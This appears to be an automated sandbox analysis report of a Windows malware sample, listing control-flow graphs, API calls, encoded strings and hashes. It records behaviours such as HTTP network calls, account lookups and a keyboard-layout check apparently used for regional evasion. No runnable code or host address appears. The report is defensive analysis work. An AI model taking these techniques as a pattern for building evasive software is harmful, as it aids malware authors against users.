3264 c268df-c268e6 call c3d593 3262->3264 3265 c268cf-c268dd 3262->3265 3264->3261 3265->3234 3265->3264 3274 c267ea-c267f9 3267->3274 3275 c26819-c2681c 3267->3275 3268->3267 3276 c267fb-c26809 3274->3276 3277 c2680f-c26816 call c3d593 3274->3277 3275->3250 3278 c26822 3275->3278 3276->3223 3276->3277 3277->3275 3278->3249 3281->3208 3282->3208 3283->3208 3284->3208 3285->3208 3286->3208 3287->3208 3288->3208 3289->3208 3290->3208 3291->3208
                                                                                                                                                                  APIs
                                                                                                                                                                  • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00C26650
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccountLookupName
                                                                                                                                                                  • String ID: GVQsgL==$IVKsgL==$RBPleCSm
                                                                                                                                                                  • API String ID: 1484870144-3856690409
                                                                                                                                                                  • Opcode ID: ae3b92465e541c0abb2f3e0ded24c67096f951027bc755206b452fd84efbcd08
                                                                                                                                                                  • Instruction ID: c29a1781441e25c029902f67d7b772e351119a9cae274c367ba1d6d96e60cd4a
                                                                                                                                                                  • Opcode Fuzzy Hash: ae3b92465e541c0abb2f3e0ded24c67096f951027bc755206b452fd84efbcd08
                                                                                                                                                                  • Instruction Fuzzy Hash: B991D1B190012C9BDB28DF28DC85BEDB779EB49304F4045E9E50997682DA319FC9CFA4
                                                                                                                                                                  Function 00C3D312 Relevance: .2, Instructions: 172COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00C2247E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ___std_exception_copy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2659868963-0
                                                                                                                                                                  • Opcode ID: cd9c1bb19990b1c4837a1a1996e275003ebace2ca1c8852302f65d6bc6fccd5b
                                                                                                                                                                  • Instruction ID: 761b55c8f15a606e1ca4dd7a898f86f343842233622d31807f6d8769a51d9b52
                                                                                                                                                                  • Opcode Fuzzy Hash: cd9c1bb19990b1c4837a1a1996e275003ebace2ca1c8852302f65d6bc6fccd5b
                                                                                                                                                                  • Instruction Fuzzy Hash: 5A51BFB2A106058FDB19CF69E8C57AEBBF0FB08310F24856AD816EB254D7749A40DF64
                                                                                                                                                                  Function 00C342A0 Relevance: 42.8, APIs: 1, Strings: 22, Instructions: 2558sleepCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00C37870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00C3795C
                                                                                                                                                                    • Part of subcall function 00C37870: __Cnd_destroy_in_situ.LIBCPMT ref: 00C37968
                                                                                                                                                                    • Part of subcall function 00C37870: __Mtx_destroy_in_situ.LIBCPMT ref: 00C37971
                                                                                                                                                                    • Part of subcall function 00C2BD60: InternetOpenW.WININET(00C78D70,00000000,00000000,00000000,00000000), ref: 00C2BDED
                                                                                                                                                                    • Part of subcall function 00C2BD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00C2BE11
                                                                                                                                                                    • Part of subcall function 00C2BD60: HttpOpenRequestA.WININET(?,00000000), ref: 00C2BE5B
                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 00C34EA2
                                                                                                                                                                  • Sleep.KERNEL32 ref: 00C36B65
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestSleepXinvalid_argumentstd::_
                                                                                                                                                                  • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$invalid stoi argument$stoi argument out of range
                                                                                                                                                                  • API String ID: 4201286991-2304726402
                                                                                                                                                                  • Opcode ID: 2e0cd48b92c814167ddb30fbceb252fe39c26e1a25189ad3276959135aec5c42
                                                                                                                                                                  • Instruction ID: 60569b0658d5b0e46968d51e1e8faa909007d74b02435f88e2830330b0fa840a
                                                                                                                                                                  • Opcode Fuzzy Hash: 2e0cd48b92c814167ddb30fbceb252fe39c26e1a25189ad3276959135aec5c42
                                                                                                                                                                  • Instruction Fuzzy Hash: 14234871E201589BEF19DB28CD8979DBB72AF85304F50829CE009AB2C6DB359F85CF51
                                                                                                                                                                  Function 00C346C0 Relevance: 35.5, APIs: 1, Strings: 21, Instructions: 2484COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00C37870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00C3795C
                                                                                                                                                                    • Part of subcall function 00C37870: __Cnd_destroy_in_situ.LIBCPMT ref: 00C37968
                                                                                                                                                                    • Part of subcall function 00C37870: __Mtx_destroy_in_situ.LIBCPMT ref: 00C37971
                                                                                                                                                                    • Part of subcall function 00C2BD60: InternetOpenW.WININET(00C78D70,00000000,00000000,00000000,00000000), ref: 00C2BDED
                                                                                                                                                                    • Part of subcall function 00C2BD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00C2BE11
                                                                                                                                                                    • Part of subcall function 00C2BD60: HttpOpenRequestA.WININET(?,00000000), ref: 00C2BE5B
                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 00C34EA2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
                                                                                                                                                                  • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range
                                                                                                                                                                  • API String ID: 2414744145-1662704651
                                                                                                                                                                  • Opcode ID: f036ff14d176eac522f21f489dc1ce002433e6a6e0a976c97f936cd105deb612
                                                                                                                                                                  • Instruction ID: d3444fafce4faa1be05a915dd1e07b64cbd4fe40521ea204d15e68a4e56af95b
                                                                                                                                                                  • Opcode Fuzzy Hash: f036ff14d176eac522f21f489dc1ce002433e6a6e0a976c97f936cd105deb612
                                                                                                                                                                  • Instruction Fuzzy Hash: DD233671E202589BEB19DB28CD8979DBB769F81304F5082D8E009AB2C6DB359FC5CF51
                                                                                                                                                                  Function 00C33550 Relevance: 18.3, APIs: 1, Strings: 9, Instructions: 761COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 2638 c33550-c33589 2639 c34160-c34166 2638->2639 2640 c3358f-c335df call c37f30 2638->2640 2641 c34194-c341ac 2639->2641 2642 c34168-c34174 2639->2642 2653 c34237 call c38070 2640->2653 2654 c335e5-c3362b call c37f30 2640->2654 2646 c341da-c341f2 2641->2646 2647 c341ae-c341ba 2641->2647 2644 c34176-c34184 2642->2644 2645 c3418a-c34191 call c3d593 2642->2645 2644->2645 2649 c34273 call c56b9a 2644->2649 2645->2641 2655 c341f4-c34200 2646->2655 2656 c3421c-c34236 call c3cf21 2646->2656 2651 c341d0-c341d7 call c3d593 2647->2651 2652 c341bc-c341ca 2647->2652 2651->2646 2652->2649 2652->2651 2667 c3423c call c38070 2653->2667 2654->2653 2672 c33631-c3366f call c37f30 2654->2672 2657 c34212-c34219 call c3d593 2655->2657 2658 c34202-c34210 2655->2658 2657->2656 2658->2649 2658->2657 2674 c34241 call c56b9a 2667->2674 2672->2653 2677 c33675-c336c0 call c37f30 call c37870 call c25b20 2672->2677 2678 c34246 call c56b9a 2674->2678 2692 c336c2 2677->2692 2693 c336c4-c336f9 call c38ad0 2677->2693 2682 c3424b call c38070 2678->2682 2685 c34250 call c56b9a 2682->2685 2689 c34255 call c56b9a 2685->2689 2694 c3425a-c3425f call c3c0c9 2689->2694 2692->2693 2693->2667 2699 c336ff-c3372e call c37f30 2693->2699 2698 c34264 call c56b9a 2694->2698 2702 c34269-c3426e call c3c109 2698->2702 2704 c33730-c3373f 2699->2704 2705 c3375f-c33784 call c29820 2699->2705 2702->2649 2707 c33741-c3374f 2704->2707 2708 c33755-c3375c call c3d593 2704->2708 2713 c3378a-c337f2 call c37870 call c25b20 call c37f30 2705->2713 2714 c33c68-c33c6e 2705->2714 2707->2674 2707->2708 2708->2705 2750 c337f6-c3382d call c393a0 2713->2750 2751 c337f4 2713->2751 2715 c33c70-c33c7c 2714->2715 2716 c33c9c-c33ca2 2714->2716 2718 c33c92-c33c99 call c3d593 2715->2718 2719 c33c7e-c33c8c 2715->2719 2721 c33cd0-c33cd6 2716->2721 2722 c33ca4-c33cb0 2716->2722 2718->2716 2719->2698 2719->2718 2723 c33d04-c33d1c 2721->2723 2724 c33cd8-c33ce4 2721->2724 2727 c33cb2-c33cc0 2722->2727 2728 c33cc6-c33ccd call c3d593 2722->2728 2732 c33d1e-c33d2d 2723->2732 2733 c33d4d-c33d53 2723->2733 2730 c33ce6-c33cf4 2724->2730 2731 c33cfa-c33d01 call c3d593 2724->2731 2727->2698 2727->2728 2728->2721 2730->2698 2730->2731 2731->2723 2739 c33d43-c33d4a call c3d593 2732->2739 2740 c33d2f-c33d3d 2732->2740 2733->2639 2736 c33d59-c33d65 2733->2736 2742 c34156-c3415d call c3d593 2736->2742 2743 c33d6b-c33d79 2736->2743 2739->2733 2740->2698 2740->2739 2742->2639 2743->2698 2748 c33d7f 2743->2748 2748->2742 2755 c3385a-c33867 2750->2755 2756 c3382f-c3383a 2750->2756 2751->2750 2759 c33869-c33878 2755->2759 2760 c33898-c3389f 2755->2760 2757 c33850-c33857 call c3d593 2756->2757 2758 c3383c-c3384a 2756->2758 2757->2755 2758->2678 2758->2757 2762 c3387a-c33888 2759->2762 2763 c3388e-c33895 call c3d593 2759->2763 2764 c33a63-c33a93 call c57443 call c58979 2760->2764 2765 c338a5-c338c7 2760->2765 2762->2678 2762->2763 2763->2760 2764->2694 2778 c33a99-c33a9c 2764->2778 2765->2682 2766 c338cd-c338ff call c37f30 call c2aca0 2765->2766 2779 c33901-c33907 2766->2779 2780 c33957-c33960 2766->2780 2778->2702 2781 c33aa2-c33aa5 2778->2781 2782 c33935-c33954 2779->2782 2783 c33909-c33915 2779->2783 2784 c33962-c33971 2780->2784 2785 c33991-c339d1 call c37870 * 2 call c24960 2780->2785 2781->2714 2786 c33aab 2781->2786 2782->2780 2788 c33917-c33925 2783->2788 2789 c3392b-c33932 call c3d593 2783->2789 2790 c33973-c33981 2784->2790 2791 c33987-c3398e call c3d593 2784->2791 2826 c339d3-c339d9 2785->2826 2827 c33a29-c33a32 2785->2827 2792 c33ab2-c33b77 call c37f30 call c37870 call c25b20 call c37870 * 5 2786->2792 2793 c33e52-c33eb4 call c37870 * 4 call c32e20 2786->2793 2794 c33d84-c33e4d call c37f30 call c37870 call c25b20 call c37870 * 5 2786->2794 2795 c33b9d-c33c62 call c37f30 call c37870 call c25b20 call c37870 * 5 call c31dd0 2786->2795 2788->2685 2788->2789 2789->2782 2790->2685 2790->2791 2791->2785 2876 c33b7b-c33b8d call c37870 call c307f0 2792->2876 2793->2714 2794->2876 2795->2714 2833 c33a07-c33a26 2826->2833 2834 c339db-c339e7 2826->2834 2827->2764 2831 c33a34-c33a43 2827->2831 2838 c33a45-c33a53 2831->2838 2839 c33a59-c33a60 call c3d593 2831->2839 2833->2827 2841 c339e9-c339f7 2834->2841 2842 c339fd-c33a04 call c3d593 2834->2842 2838->2689 2838->2839 2839->2764 2841->2689 2841->2842 2842->2833 2882 c33b92-c33b98 2876->2882 2882->2714
                                                                                                                                                                  APIs
                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 00C3425F
                                                                                                                                                                    • Part of subcall function 00C37870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00C3795C
                                                                                                                                                                    • Part of subcall function 00C37870: __Cnd_destroy_in_situ.LIBCPMT ref: 00C37968
                                                                                                                                                                    • Part of subcall function 00C37870: __Mtx_destroy_in_situ.LIBCPMT ref: 00C37971
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
                                                                                                                                                                  • String ID: "$5120$Fz==$HBhr$V5Qk$W07l$WJms$invalid stoi argument$stoi argument out of range
                                                                                                                                                                  • API String ID: 4234742559-3767745505
                                                                                                                                                                  • Opcode ID: e31f730c26b2971ec0aa405e49a17ec71057f44f0a4e7f95e29fb4b6429b9d9d
                                                                                                                                                                  • Instruction ID: 087ed5ee0153873bd756f2f24893d141dd0d9b65704c4a0153f404454d74003a
                                                                                                                                                                  • Opcode Fuzzy Hash: e31f730c26b2971ec0aa405e49a17ec71057f44f0a4e7f95e29fb4b6429b9d9d
                                                                                                                                                                  • Instruction Fuzzy Hash: 2A5225B1A20248DBEF18EF78CC4A79DBB75AF45304F50429CE405A72C2D7359B84DBA2
                                                                                                                                                                  Function 00C25C60 Relevance: 16.2, APIs: 4, Strings: 5, Instructions: 473registryCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 2962 c25c60-c25d33 call c54020 RegOpenKeyExA RegCloseKey 2966 c25d36-c25d3b 2962->2966 2966->2966 2967 c25d3d-c25d96 call c37f30 2966->2967 2971 c25dc0-c25ddc call c3cf21 2967->2971 2972 c25d98-c25da4 2967->2972 2973 c25db6-c25dbd call c3d593 2972->2973 2974 c25da6-c25db4 2972->2974 2973->2971 2974->2973 2976 c25ddd-c25eee call c56b9a 2974->2976 2987 c25ef0-c25efc 2976->2987 2988 c25f18-c25f25 call c3cf21 2976->2988 2989 c25f0e-c25f15 call c3d593 2987->2989 2990 c25efe-c25f0c 2987->2990 2989->2988 2990->2989 2992 c25f26-c260ad call c56b9a call c3e080 call c37f30 * 5 RegOpenKeyExA 2990->2992 3010 c260b3-c26143 call c54020 2992->3010 3011 c26478-c26481 2992->3011 3035 c26466-c26472 3010->3035 3036 c26149-c2614d 3010->3036 3012 c26483-c2648e 3011->3012 3013 c264ae-c264b7 3011->3013 3015 c26490-c2649e 3012->3015 3016 c264a4-c264ab call c3d593 3012->3016 3017 c264e4-c264ed 3013->3017 3018 c264b9-c264c4 3013->3018 3015->3016 3022 c2659e-c265a3 call c56b9a 3015->3022 3016->3013 3020 c2651a-c26523 3017->3020 3021 c264ef-c264fa 3017->3021 3024 c264c6-c264d4 3018->3024 3025 c264da-c264e1 call c3d593 3018->3025 3030 c26525-c26530 3020->3030 3031 c2654c-c26555 3020->3031 3027 c26510-c26517 call c3d593 3021->3027 3028 c264fc-c2650a 3021->3028 3024->3022 3024->3025 3025->3017 3027->3020 3028->3022 3028->3027 3039 c26542-c26549 call c3d593 3030->3039 3040 c26532-c26540 3030->3040 3041 c26582-c2659d call c3cf21 3031->3041 3042 c26557-c26566 3031->3042 3035->3011 3043 c26153-c26187 RegEnumValueW 3036->3043 3044 c26460 3036->3044 3039->3031 3040->3022 3040->3039 3048 c26578-c2657f call c3d593 3042->3048 3049 c26568-c26576 3042->3049 3051 c2644d-c26454 3043->3051 3052 c2618d-c261ad 3043->3052 3044->3035 3048->3041 3049->3022 3049->3048 3051->3043 3056 c2645a 3051->3056 3058 c261b0-c261b9 3052->3058 3056->3044 3058->3058 3059 c261bb-c2624d call c37c50 call c38090 call c37870 * 2 call c25c60 3058->3059 3059->3051
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(?,?,00000000,00000001,?), ref: 00C25CDC
                                                                                                                                                                  • RegCloseKey.KERNEL32(?,?,?,00000000,00000001,?), ref: 00C25D16
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                  • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                                                  • API String ID: 47109696-3963862150
                                                                                                                                                                  • Opcode ID: 269c47d727b5768ddda5b3cecbdc4e4725a083870faa83f38ee6e70b0c71f472
                                                                                                                                                                  • Instruction ID: fd0ff04d0adca4e790df46938a29dfdff96f9e05e85384fe7ce61002de394466
                                                                                                                                                                  • Opcode Fuzzy Hash: 269c47d727b5768ddda5b3cecbdc4e4725a083870faa83f38ee6e70b0c71f472
                                                                                                                                                                  • Instruction Fuzzy Hash: 6F02B271900228ABEB24DF54CC89BDEB779EF04304F5042E9E509A7691DB74ABC5CFA1
